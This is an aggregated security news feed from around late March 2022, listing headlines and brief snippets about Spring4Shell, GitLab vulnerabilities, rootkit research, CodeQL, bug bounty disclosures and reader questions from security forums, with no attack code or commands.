    Chrome Zero-Day from North Korea by ourren; [Rootkit series research] Highly stealthy, highly persistent threats on the Windows platform by ourren; In-depth analysis of reflection attacks based on the OpenAFS file system by ourren; Thoughts on how to better present the value of red/blue team exercises by ourren; The Linux backdoor B1txor20, which uses DNS tunneling, is spreading via the Log4j vulnerability by ourren; An overview of commercial digital certificate issuance and usage by ourren; Spring Cloud Function SpEL expression injection by ourren; CodeQL from 0 to 0.1 by ourren; Using CodeQL to find Java second-order deserialization by ourren; A beginner's primer on K8s security by ourren; Malbox: a containerized malware practice range by ourren; "Understanding CodeQL in Depth": Finding vulnerabilities with CodeQL. by ourren; Analyzing AOSP with CodeQL by ourren; A collection of Java in-memory webshell analyses by ourren; CVE-2021-29454: analysis and reproduction of Smarty template injection by ourren; Machine learning systems: design and implementation by ourren; Projecting the "three-year" technical adoption trend for hybrid work security by ourren; A rough analysis of the LAPSUS$ attacks by ourren. For more of the latest articles, visit SecWiki.

    ZAP Structural Modifier
    If I had to pick the three most important things when finding vulnerabilities, I would probably choose understanding of the technology, understanding of the target, and intuition. Of course there are many other important factors, but these three are what I feel most strongly at work. I bring this up because today's topic is closely tied to understanding the target. It concerns ZAP, but I think Burp users can take plenty of inspiration from it too. It is the ZAP Structural Modifier. Let's begin 🚀 Structural Modifier ZAP supports a feature called Structural Modifier that lets you modify the structure of the Site Tree.

    Critical Gitlab vulnerability let attackers take over accounts
    Article URL: https://www.bleepingcomputer.com/news/security/critical-gitlab-vulnerability-lets-attackers-take-over-accounts/ Comments URL: https://news.ycombinator.com/item?id=30878924 Points: 197 # Comments: 36
    Report a security vulnerability as an ethical hacker
    Article URL: https://opencirt.com/hacking/report-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30877585 Points: 1 # Comments: 1

    Hunting for Malicious Binaries and Backdoors in the Running Containers
    submitted by /u/tbhaxor [link] [comments]

    Is PSP something to be very worried about?
    There are a lot of suspicions about AMD putting backdoors on their chips, and it's concerning a lot of people. They are a security problem and can't be mitigated. My question is for people with actual knowledge: I want more information about the risks. I know it has full write/read access, it can see everything on the PC, and it can be "remotely" manipulated. Note on remotely: it can mean many things. Does it collect any data in a telemetry fashion, or was it reported to ping weird IPs? Does remote control need to be manually activated, or is it permanently active by default? Could it have any way to not depend on the internet, like sending info via radio? And essentially: is it suspected to be made for targeted attacks or global surveillance? It's essentially a backdoor on every modern computer, so I can't be calm about it. This could be used for literally anything, but few people know what. This is why I ask here: to see if someone with knowledge can give info about this threat. I am extremely cautious about privacy, which overlaps with security, and I thought this could be a direct compromise. One of my highest goals is reducing the amount of data sent to corps. My threat model focuses more on data-hungry corps and services which want to know every detail about you and potentially have direct impact over you. I do nothing illegal and live in a democratic EU country (Poland), and I am no one important enough to be individually targeted. So I asked because I don't really feel much of a risk of being finger-pointed by agencies, but I am worried about mass surveillance methods that affect every computer in the world. PSP knowing absolutely all my PC activity is a no-no. submitted by /u/gre4tynhrj
    Non-DNS or Non-Compliant DNS traffic on DNS port in UniFi UDM IPS
    I have been seeing this alert, "ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Reserved Bit Set", almost two or three times a day. Source: 192.168.107.92:49013 (the port changes each time the alert is triggered). Destination: 1.1.1.1:53 or sometimes 8.8.8.8:53 (my upstream DNS in Pi-hole). I have been trying my best to figure this one out but with no luck; could anyone please help or guide me on how to investigate this alert? Some details: old_phone 192.168.107.79, new_phone 192.168.107.204, pihole_dns 192.168.107.92. I started seeing this error a while back after enabling IPS; every time, the source is my Pi-hole, which is used as the DNS for all network devices. When I try to match the traffic in Pi-hole with the time the alert is triggered in UDM, I always saw the same device "old_pho…
    Volunteer pentest/bug hunt program
    Hi! I am currently looking into possibilities to set up a volunteer pentest agreement or program. I am volunteering for an NGO which helps refugees, and they would like to get a pentest for their website. At first I thought that's a no-brainer: just set up a profile at a bug bounty site. But that's not so easy; e.g. Bugcrowd does not allow completely private programs and has minimum $20 rewards. We would like to keep legal costs to a minimum and wanted to avoid hiring an attorney to set up contracts, if there are other possibilities. We already have volunteering pentesters; they just wait for the legal green light to start. Any recommendations on that? submitted by /u/iiskierka
    Spring4Shell Detection
    https://github.com/west-wind/Spring4Shell-Detection If there are any other ways to detect it, please comment and let everybody know. submitted by /u/la_farfalla_
    Vulnerability Research or SOC?
    I'm about to graduate with my degree in Computer Science, with very minimal experience in cybersecurity. Right now it seems as though I may be given the opportunity to work either as a vulnerability researcher or as a SOC analyst, both junior roles where my respective seniors would help me figure things out as I transitioned into these roles. Which would you recommend as a first-experience career choice to start off with in cybersecurity? submitted by /u/justaguybye

    Resources Search Engine for Infosec based on Ippsec.rocks
    submitted by /u/sarthaksaini
    Gaining code execution on the backend of the PEAR package manager
    submitted by /u/monoimpact
    How Go Mitigates Supply Chain Attacks
    submitted by /u/e-san55
    SpringShell Zero-Day Vulnerability: All You Need To Know
    submitted by /u/SRMish3

    Passive-aggressive scan checks
    Here at PortSwigger, our goal is to enable the world to secure the web. Our scanner sits at the core of this value - quickly surfacing issues and vulnerabilities that may be present in a web applicati

    Finding bugs that don't exist

    Spring has sprung: breaking down CVE-2022-22963/CVE-2022-22965
    Article URL: https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022 Comments URL: https://news.ycombinator.com/item?id=30874271 Points: 1 # Comments: 0


    GitLab Critical Security Release: 14.9.2, 14.8.5, and 14.7.7
    submitted by /u/0xmilan
    Critical Vulnerability in Spring Core: CVE-2022-22965 a.k.a. Spring4Shell
    submitted by /u/MiguelHzBz
    IDA plugin for finding constants used in conditional statements
    submitted by /u/Martypx00
    Conti-nuation: methods and techniques observed in operations post the leaks
    submitted by /u/digicat
    GitHub Cache Poisoning
    submitted by /u/BarakScribe
    SpringShell Detector - searches compiled code (JAR/WAR binaries) for potentially vulnerable web apps
    submitted by /u/SRMish3
    Pwning 3CX Phone Management Backends from the Internet
    submitted by /u/EnableSecurity
    Spring4Shell 0-day writeup and guidance
    submitted by /u/CraZyBob

    CVE-2022-22965: Spring Core Remote Code Execution Vulnerability Exploited In the Wild (SpringShell)
    CVE-2022-22965, aka SpringShell, is a remote code execution vulnerability in the Spring Framework. We provide a root cause analysis and mitigations.

    Path of least Resistance
    Hello! I am a student finishing my master's in computer engineering, and I also work as a consultant doing DevOps and cloud infrastructure management. I am really interested in cyber and have focused my master's around security and networking. I have also done some free online courses on cyber security. I am trying to pitch to my superiors the idea of providing cyber security services to your clients, but since we do not have a cyber team, I was thinking about which area of cyber would be the "easiest" to start offering. submitted by /u/Ap0k4lips3
    What do you guys think about SSL?
    Do you think Let's Encrypt auto 3-month renewal (with certbot) is worth it, or do I buy a Comodo or digital cert? I am starting my own cybersecurity company as a contractor LLC, and will be building a website and also using an email based on that email; can I use the SSL certificate for both? submitted by /u/Morpheus_mmg
    PoC available for CVEs
    Is there someplace where CVEs have a PoC-available status? I looked at Exploit-DB, but they don't have anything for the Spring vuln, and I'm wanting something that updates faster than that. Edit: I look at https://cvetrends.com/, and when a new CVE bubbles to the top I would like to know if a PoC has been released for it. submitted by /u/rogueit
    USB WiFi with external antenna attachment, usable on Linux?
    What are decent USB WiFi devices that allow attaching an external antenna and can also run in monitor mode on Linux? I'd like to try the aircrack-ng attacks on my home network, which includes a number of wireless access points. I've got a TP-LINK TL-WN722N, but I think it isn't capable of doing the 5Mhz channels, which I'd like to try out. I don't have any Windows machines. submitted by /u/bediger4000
    Deciding between Varonis and Digital Guardian
    I'm in an org with a decent budget for tools, yet I am the only infosec analyst on staff, so there is limited time to spend on them. We currently have both Varonis and Digital Guardian deployed, though we are not fully leveraging either of them, and from a value perspective it may not make sense to renew them both as it currently stands. In my limited experience with them I see a lot of overlap with some unique characteristics for each, like the DG agent on endpoints being able to take a block action on data, versus some fairly nice behavior analysis through Varonis on user and group access with recommendations. Is anyone familiar with either or both of these products and has insights on how well they complement each other, or whether one can mostly supplant the other? submitted by /u/EnterNam0
    Internet-facing host (hypervisor) security question - setup
    I thought about a setup to maximize physical host usage by running Proxmox (hypervisor) on an internet-facing machine. The hypervisor OS would have 2 NICs: eth0 configured with an internal IPv4 address (for management purposes), and eth1 (the internet-facing adapter) with no IP (v4 or v6) configured on the hypervisor OS (present only to be attached to the router VM). eth1 will be attached only to the router VM (pfSense), which will also have another vNIC bridged to the internal network for obvious reasons. What issues/risks do you think this setup poses, and how would you secure it? This obviously will be only a home lab setup, not for a business etc. Thank you! submitted by /u/j0hnnyrico
    I think my neighbor is spamming my WiFi router with deauth packets
    Title. I've been getting kicked off my WiFi at night for 3 days straight; how can I confirm this so I can go to the police? I have an 802.xx device with aircrack-ng. submitted by /u/Far-Veterinarian9464
    Do I need an antivirus with iOS?
    Most of the AVs don't offer what they offer on Android, as iOS already has built-in security features that essentially don't let AVs function. submitted by /u/jigjagascrp4
    Which should I choose? @gmail.com - @outlook.com - @icloud.com
    Not talking about apps, just domains (as I'm gonna use Apple Mail anyway): which one should I choose when creating an email address? submitted by /u/jigjagascrp4

    [Security Advisory] Spring Framework Remote Command Execution Vulnerability (CVE-2022...
    Recently, an official Spring GitHub issue mentioned a remote command execution vulnerability in Spring Core; the vulnerability is widespread in the Spring fra...

    Information Leakage via TikTok Ads Web Cache Deception
    TikTok disclosed a bug submitted by arifmkhls: https://hackerone.com/reports/1484468 - Bounty: $200
    Stored XSS in merge request creation page through payload in approval rule name
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1342009 - Bounty: $3000
    IDOR: leak buyer info & Publish/Hide foreign comments
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1410498 - Bounty: $1250
    Stored XSS in Question edit from product name
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1416672 - Bounty: $500
    stored XSS on AliExpress Review Importer/Products when delete product
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1425882 - Bounty: $500
    Stored XSS in Question edit for product name (bypass #1416672)
    Judge.me disclosed a bug submitted by glister: https://hackerone.com/reports/1428207 - Bounty: $500

    Gitlab – Static passwords set during OmniAuth-based registration (CVE-2022-1162)
    Article URL: https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ Comments URL: https://news.ycombinator.com/item?id=30872415 Points: 8 # Comments: 0
    A Technical Analysis of How Spring4Shell (CVE-2022-22965) Works
    Article URL: https://www.extrahop.com/company/blog/2022/a-technical-analysis-of-how-spring4shell-works/ Comments URL: https://news.ycombinator.com/item?id=30870453 Points: 12 # Comments: 6
    Rust Open Source CVE Search Engine
    Article URL: https://github.com/Exein-io/kepler Comments URL: https://news.ycombinator.com/item?id=30866901 Points: 1 # Comments: 0
    Future-Proofing SaltStack (CVE-2022-22934, CVE-2022-22935, CVE-2022-22936)
    Article URL: https://blog.cloudflare.com/future-proofing-saltstack/ Comments URL: https://news.ycombinator.com/item?id=30866784 Points: 3 # Comments: 0

    Cross-Site Scripting (XSS) via image rendering application
    Hello Hackers, I'm MrEmpy, I'm 17 years old and welcome. Today I'm going to teach you how to test an image rendering application and be…
    80+ million Digilocker users' phone numbers exposed [Fixed]
    This is a story about my latest finding at Digilocker. In bug bounty we call these types of issues "low hanging fruits". I already contribute…
    Hats Protocol Economics — Part I
    Long-term sustainability and token utility
    CloudSek EWYL 2022 CTF
    Solving a Harry Potter Themed CTF

    Website OSINT
    Detecting malware packages in GitHub Actions
    CloudSek EWYL 2022 CTF

    Spring Remote Code Execution Vulnerability
    Article URL: https://talktotheduck.dev/spring-remote-code-execution-vulnerability Comments URL: https://news.ycombinator.com/item?id=30871886 Points: 12 # Comments: 1
    Vulnerability in the Combined Charging System for Electric Vehicles
    Article URL: https://www.brokenwire.fail/ Comments URL: https://news.ycombinator.com/item?id=30867098 Points: 2 # Comments: 0
    New Spring4Shell Zero-Day Vulnerability What it is and how to be prepared
    Article URL: https://www.contrastsecurity.com/security-influencers/new-spring4shell-vulnerability-confirmed-what-it-is-and-how-to-be-prepared Comments URL: https://news.ycombinator.com/item?id=30865001 Points: 2 # Comments: 0

    Exploring a New Class of Kernel Exploit Primitive
    submitted by /u/soupcreamychicken

    XSS Vulnerability Part 1
    Greetings, in this article I want to describe the XSS vulnerability in detail.
    REFLECTED XSS IN DEPED.GOV.PH BY NEUCHI
    Hello Infosec Community

    Website OSINT
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques and tools to gather information about several websites and…
    How to clean a smartphone that fell into the wrong hands?
    Let's talk about the safety of your smartphone in cases where it has fallen or is about to fall into the wrong hands. Firstly, the regular…
    Ukraine: Situation update as of 1 April
    The last 24 hours
    TryHackMe: Content Discovery Writeup
    This room aims to teach the various ways of discovering hidden or private content on a webserver that could lead to new vulnerabilities…
    War in Ukraine / March 30
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to…
    9 reliable and free OSINT tools
    Maltego (https://www.maltego.com/) is one of the best data visualization and investigation automation systems in the world. Used even by…
    Identification of cryptocurrency wallets
    Let's talk about the identification of cryptocurrency wallets.
    Deanonymization of a Skype profile
    Today I will tell you about the deanonymization of a Skype profile. It is appropriate to start researching a Skype profile by trying to…

    SEC Filings for Nova Scotia Bank
    Hi all. Interesting one, may or may not have been posted before. Probably publicly available. https://www.sec.gov/Archives/edgar/data/9631/000114036122011592 submitted by /u/Stan464

    Chrome 101: Federated Credential Management Origin Trial, Media Capabilities for WebRTC, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 101 is beta as of March 31, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Reduce User Agent String Information Chrome is trying to reduce the amount of information the user agent string exposes in HTTP requests as well as in navigator.userAgent, navigator.appVersion, and navigator.platform. We're doing this to prevent the user agent string from being used for passive user fingerprinting. To join the origin trial, see its entry on Chrome Origin Trials. See the end of this article for…
    What to Expect from Privacy Sandbox Testing
    We’re excited to share that Chrome is starting the next stage of testing for the Privacy Sandbox ads relevance and measurement proposals. Starting today, developers can begin testing globally the Topics, FLEDGE, and Attribution Reporting APIs in the Canary version of Chrome. We’ll progress to a limited number of Chrome Beta users as soon as possible. Once things are working smoothly in Beta, we’ll make API testing available in the stable version of Chrome to expand testing to more Chrome users. We recognize that developers will need some time to use the APIs, validate the data flows, and measure performance. We are looking forward to companies providing feedback as they move through the different testing phases, which will allow us to continually improve the APIs. Once we’re confident that…

    SecWiki News 2022-03-31 Review
    CodeQL Pitfall Guide - Java by ourren; CodeQL Advanced: Route Collection by ourren. For more of the latest articles, visit SecWiki.

    Ajax Spidering: Performance Comparison by Browser Engine 🏁
    ZAP's AjaxSpider is a feature that spiders a site by browsing it directly through a headless browser. Firefox is configured by default, but depending on personal preference you can use various browsers (headless or regular) such as Chrome and PhantomJS. I suddenly got curious: which one is the fastest and collects the most? So I decided to compare them. TLDR firefox: Found 675 URLs chrome: Found 382 URLs phantomjs: Found 340 URLs How to test The method is simple. Run AjaxSpidering against Security Crawl Maze and compare the number of URLs collected.
    Cullinan
    Cullinan is a wiki for hacking/security/bugbounty. Cullinan is a wiki and cheatsheet page for hacking/security/bugbounty. It covers definitions of common vulnerabilities, testing methods, bypass techniques, and countermeasures, as well as tools and tutorials. If you have a good idea or additional comments about the page, please send me (@hahwul) a tweet.

    HomeGrown Red Team: Let's Evade AV And Run Lazagne
    What is Lazagne?
    SnapAttack Launches Community Edition to Drive Collaboration Across Cybersecurity Community
    Company launches free of charge platform providing access to a vast library of attack and detection content, including the latest threats…

    Collecting artefacts from a Windows/Linux system using an SSH remote connection
    I want to know how I can use SSH to connect remotely to a Windows or Linux system, access the artefacts (event logs, registry keys, files, timestamps) of the system, and save them to the system I'm connecting from. submitted by /u/EzraSC

    Effective 1 July: the Chongqing Municipal Data Regulations are officially released
    The Regulations comprise 8 chapters and 60 articles: general provisions, data processing and security, data resources, the data factor market, development and application, regional coordination, and legal liability.
    Mastering Directory Traversal Vulnerabilities from 0 to 1
    A directory traversal vulnerability is caused by a website configuration defect that allows the site's directories to be browsed freely, leading to the leakage of many private files and directories.
    FreeBuf Enterprise Group Discussion | Enterprise Network Security During the Pandemic
    How much protective value does remotely using a company-issued computer loaded with security tools actually provide? How should an enterprise build its authentication mechanisms to ensure security?
    Mastering SQL Injection from 0 to 1
    Brain-Computer Interface Technology Research Report
    A brain-computer interface is a direct connection created between the brain and an external device, enabling information exchange between the two. Its workflow includes the collection and acquisition of EEG signals, signal processing, signal output and execution, and finally feeding the signals back to the brain.
    CISA and DoE jointly warn of cyberattacks targeting internet-connected UPS devices
    CISA and DoE have jointly published guidance on mitigating attacks against internet-connected uninterruptible power supply (UPS) devices and issued a corresponding alert to enterprises.
    Lapsus$ extortion gang claims to have attacked IT giant Globant
    Recently, the extortion gang Lapsus$ claimed to have breached IT giant Globant and leaked roughly 70 GB of stolen data online.
    Surveillance software company FinFisher declares bankruptcy
    Munich-based spyware company FinFisher declared bankruptcy last month, and the authorities are investigating its business dealings.
    Personal data of 820,000 New York students exposed
    Recently, a widely used online grading and attendance system in New York was hacked, in what may be the largest exposure of student personal data in US history. Criminals broke into the Illuminate Education IT systems in January and gained access to a database containing the personal data of about 820,000 current and former New York City public school students. Illuminate Education is a taxpayer-funded software company based in California. The company created the popular IO Classroom, Skedula and
    Some Honda models have a vulnerability that lets hackers start the vehicle remotely
    Hackers can unlock and start vehicles through a replay attack on the Honda vulnerability.
    Walk with the wise: FreeBuf Consulting's TTSP think-tank expert recruitment is now open
    Starting today, open recruitment for the TTSP security think tank is underway; security professionals who want to exchange ideas, learn together and jointly advance the cybersecurity industry are welcome to sign up.

    [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2)
    Author: Sangfor Qianliju Security Lab (深信服千里目安全实验室). Related reading: 1. [Rootkit Series Research] Prologue: The Sword of Damocles Overhead 2. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Series Research] The Current State of Rootkit Detection Technology 5. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2). Preface...
    [Rootkit Series Research] The Current State of Rootkit Detection Technology
    Author: Sangfor Qianliju Security Lab (深信服千里目安全实验室). Related reading: 1. [Rootkit Series Research] Prologue: The Sword of Damocles Overhead 2. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Series Research] The Current State of Rootkit Detection Technology 5. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2). Abstract...
    [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Linux Platform
    Author: Sangfor Qianliju Security Lab (深信服千里目安全实验室). Related reading: 1. [Rootkit Series Research] Prologue: The Sword of Damocles Overhead 2. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Series Research] The Current State of Rootkit Detection Technology 5. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2). Preface...
    Malicious Word Files Targeting Enterprise Users
    Translator: Knownsec 404 Team translation group. Original link: https://asec.ahnlab.com/en/33186/ The ASEC research team discovered a Word file that appears to target enterprise users. The file contains an image prompting the user to enable a macro, as typical malicious files do. To trick the user into believing it is a harmless file, when the macro runs it displays information about improving Google account security. Ultimately, it downloads additional malware files and exfiltrates user information. When the file is run, it displays...
    [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform
    Author: Sangfor Qianliju Security Lab (深信服千里目安全实验室). Related reading: 1. [Rootkit Series Research] Prologue: The Sword of Damocles Overhead 2. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform 3. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Linux Platform 4. [Rootkit Series Research] The Current State of Rootkit Detection Technology 5. [Rootkit Series Research] Highly Stealthy, Highly Persistent Threats on the Windows Platform (Part 2). 从西...

    Effective Seed Scheduling for Fuzzing with Graph Centrality Analysis(S&P22)
    We use graph centrality scores to build a generic seed scheduler for LibFuzzer, AFL and concolic execution engine in QSYM. Check our paper at https://arxiv.org/abs/2203.12064. Our code and replication package are available at https://github.com/Dongdongshe/K-Scheduler. Comments URL: https://news.ycombinator.com/item?id=30863270 Points: 1 # Comments: 0

    SpringShell: Spring Core RCE 0-day Vulnerability
    submitted by /u/Gorkha56


    lunasec/2022-03-30-spring-core-rce
    submitted by /u/hackerboy69
    Spring Core on JDK9+ is vulnerable to remote code execution
    submitted by /u/ScottContini
    Spring4Shell: Security Analysis of the latest Java RCE '0-day' vulnerabilities
    submitted by /u/freeqaz
    Betabot in the Rearview Mirror
    submitted by /u/krabsonsecurity
    Top 3 Stealer Malware Activity Research
    submitted by /u/mstfknn
    [OC] Data Exfiltration using RedDrop - A Python Webserver for file and data exfiltration which automatically detects, decodes, decrypts, and transforms data.
    submitted by /u/cyberbutler
    Threat Alert: First Python Ransomware Attack Targeting Jupyter Notebooks
    submitted by /u/esdaniel-
    A few vulnerabilities discovered in Wyze Cam (CVE-2019-9564, CVE-2019-12266)
    submitted by /u/jaymzu
    Decrypting your own HTTPS traffic with Wireshark
    submitted by /u/Quantum_Rage
    Cisco Nexus Dashboard Fabric Controller unauth web-to-root shell
    submitted by /u/ChoiceGrapefruit0
    Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
    submitted by /u/Gallus
    Spring Cloud Function SPEL Expression Injection Vulnerability Alert
    submitted by /u/Gallus

    EDRs & Shellcode Loaders
    In this post I have covered the basics of how EDR products work and also some ways to get around them (some source code included).
    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps

    New Wave of AnonymousFox Cron Jobs
    Recently our Remediation and Research teams have noticed a new wave of malicious cron jobs associated with the notorious AnonymousFox malware. The cron jobs are purpose-built to reinfect the victim websites and make removal of the infection more cumbersome and time-consuming. In this post we'll investigate one of these malicious cron jobs, describe what it does and how you can recognise and remove them on your website. If you're currently dealing with such a hack you can check out our extensive AnonymousFox Hack Guide for help with removing the infection from your environment.

    TryHackMe: Sakura Room
    OSINT challenge
    Ukraine: Situation update as of 31 March
    The last 24 hours
    War in Ukraine / March 29
    The Molfar team sends a daily newsletter about the war in Ukraine. You can subscribe to the newsletter by sending your email address to…

    ihsinme: CPP Add a query to find incorrectly used exceptions.
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1455531 - Bounty: $1000
    [Python]: Add shutil module sinks for path injection query
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1471622 - Bounty: $1000
    Java: An experimental query for ignored hostname verification
    GitHub Security Lab disclosed a bug submitted by artem: https://hackerone.com/reports/1481247 - Bounty: $1800
    [Java]: CWE-073 - File path injection with the JFinal framework
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1483918 - Bounty: $1800
    CPP: Add query for CWE-266 Incorrect Privilege Assignment
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1483919 - Bounty: $1800
    [C#] CWE-759: Query to detect password hash without a salt
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1484086 - Bounty: $1800
    Java : Add query to detect Server Side Template Injection (SSTI)
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1490372 - Bounty: $1800
    Python: CWE-338 insecureRandomness
    GitHub Security Lab disclosed a bug submitted by museljh: https://hackerone.com/reports/1490400 - Bounty: $1800
    [Java]: Timing attacks while comparing the headers value
    GitHub Security Lab disclosed a bug submitted by farid_hunter: https://hackerone.com/reports/1496268 - Bounty: $1000
    [Java]: Add JDBC connection SSRF sinks
    GitHub Security Lab disclosed a bug submitted by p0wn4j: https://hackerone.com/reports/1512936 - Bounty: $1800
    [Python]: CWE-611: XXE
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1512937 - Bounty: $1800
    CPP: Add query for CWE-377 Insecure Temporary File
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1515139 - Bounty: $1000
    [Java]: CWE-200 - Query to detect insecure WebResourceResponse implementation
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1526609 - Bounty: $1800
    Upload Profile Photo in any folder you want with any extension you want
    Stripo Inc disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/753375
    Insecure Storage and Overly Permissive API Keys
    Stripo Inc disclosed a bug submitted by andformod: https://hackerone.com/reports/1283575
    Ability to use premium templates as free user via https://stripo.email/templates/?utm_source=viewstripo&utm_medium=referral
    Stripo Inc disclosed a bug submitted by 0xkira: https://hackerone.com/reports/1166993

    Tool for Chromebook forensic acquisition
    Does anyone know of a tool that I can use for Chromebook forensic acquisition (K-12 environment)? The company Magnet Forensics had such a tool, but they no longer support it. submitted by /u/1682aggie
    Cyber Triage vs Magnet AXIOM Cyber
    I get that Axiom's analysis might be a little better/different. But in terms of remote triage, what's the difference? Is one cheaper? submitted by /u/CrazyKitty2016
    The Truth About USB Device Serial Numbers
    submitted by /u/shelbpresc

    What are some RPOs for popular compliance standards?
    Also, how does your company determine its Recovery Point Objectives? submitted by /u/CitizenJosh [link] [comments]
    How to validate Dom xss via via scripts
    Hey everyone. I've been around for a while but have avoided certain topics like the plague. Dom xss is one of those but today I watched a video on it that recommended reviewing the pages code and going through that method to discover Dom xss. Now to be clear what brought this on was a finding in burp, it's flagging on a JS file and from there location.hash data being passed to an element/value. What I could use some help with is understanding this type of Dom xss and how to validate this. I'm tired of not understanding this. My thought is that this js file has a vulnerable function and I should be looking for this function in use in the application somewhere. Oh also I'm not the most intelligent person and have no real experience with Javascript so it may be necessary to dumb some things down. And if there's a video that talks about this I would appreciate it. All the ones I've seen just show document.write directly in the web page not in a script. submitted by /u/realKevinNash [link] [comments]
    How to document access request workflows?
    A common problem is that people new in an organization don't know how to get access to certain systems. Are there known best practices how to help people orient themselves what access they need to request to achieve a certain task? E.g. I want to access system ABC, therefore I need role "ABC user" and should raise this request with "ABC admins" who can be found here: "[xyz@example.com](mailto:xyz@example.com)" submitted by /u/soroyaya [link] [comments]
    Mandatory Access Control Frameworks
    Hi, I want to improve on my rather rudimentary knowledge of MAC frameworks (SELinux, AppArmor). Can you point me to learning material/courses that you have had good experience with? submitted by /u/turingtest1 [link] [comments]
    I am using Burp Suite to intercept traffic from a site and am trying to view the images from the proxy, but the site uses WebSockets to send all the images as Data URIs (Base64) at once, to be loaded on demand, which is called "lazy loading". Alternatively, how do I get Driftnet to work on Data URIs?
    Can lazy loading be considered some sort of protection against tools that sniff images over the network, like Driftnet? Image of the Burp session and the data. Thanks a lot. submitted by /u/theycallmemonlight [link] [comments]
  • Open

    Possible New Java Spring Framework Vulnerability (Updated: Not a Spring Problem)
    Article URL: https://isc.sans.edu/diary/Possible+new+Java+Spring+Framework+Vulnerability+%28Updated%3A+not+a+Spring+problem%29/28498 Comments URL: https://news.ycombinator.com/item?id=30858065 Points: 2 # Comments: 0
  • Open

    Going Through FBI's "Oversight of the FBI Cyber Division" Testimony
    The FBI has recently released its "Oversight of the FBI Cyber Division" in the form of a testimony, which offers quite an important peek inside the FBI's understanding of current and emerging cyber threats, including its situational awareness in the world of cybercrime and cyber-related fraud and threats. An excerpt: "The most significant nation-state threats we face are those
    The FCC Adds Kaspersky to Its List of National Security Threats
    The FCC has recently added Kaspersky products to its list of National Security Threats, while the company publicly issued a statement claiming that the decision was made on political grounds. The company also cited yet another decision by the U.S. DHS back in 2017 which basically forbids U.S.-based companies from doing business with the company. In the past I've discussed how central antivirus
    Courtesy of Republic of Bulgaria! - Part Five
    In the deepest and ugliest and most disgusting corners of the universal irrelevance of the universe known as dipshit land savage land peasant land there's a universal dipshit known as? Guess what? I won't tell you and best of all you don't have to guess for yourself. Don't bother. Related posts:Courtesy of Republic of Bulgaria! - Part FourCourtesy of Republic of Bulgaria! - Part ThreeCourtesy of
  • Open

    SecWiki News 2022-03-30 Review
    No news updated today. For more recent articles, visit SecWiki.
  • Open

    Shellcode as User Input | Off Topic if I may
    submitted by /u/C0DEV3IL [link] [comments]
    Whitepaper – Double Fetch Vulnerabilities in C and C++
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Unsafe content loading [Electron JS]
    Phishing in misconfigured Electron apps Continue reading on Medium »
    My Pentest Log -12- (Out-Of-Band Sql Injection in MySQL)
    Greetings to everyone from Byzantion, Continue reading on Medium »
    Universe Finance x Immunefi: Bug Bounty Program
    Dear spacemen, Continue reading on Medium »
    How I was able to collect PII of all users
    Hello Folks 👋, Continue reading on Medium »
  • Open

    Unintended root(s) on Fortress
    No content preview
    Browser-in-the Browser (BITB) — A New Born Phishing Methodology
    No content preview
    eCTHPv2 Certification Experience
    No content preview
    eJPT Journey
    No content preview
    TryHackMe: Aratus
    No content preview
    TryHackMe writeup: IDE
    No content preview
    Analyze your gau result with Gau-Expose Tool
    No content preview
  • Open

    Notion as a platform for offensive operations
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Simplifying Your Operational Threat Hunt Planning
    Opening Hopefully you all were able to read our recent Threat Hunting whitepaper and had the chance to listen to our latest Threat Hunting webinar. These references should be used as the foundation of information, which leads us into the next journey: how to build out your first Threat Hunt. Building out an organization’s Threat... The post Simplifying Your Operational Threat Hunt Planning appeared first on TrustedSec.
  • Open

    The latest global DDoS attack trends in one chart
    The latest global DDoS attack trends, in one chart.
    "Transparent Tribe" APT group is attacking Indian officials at scale
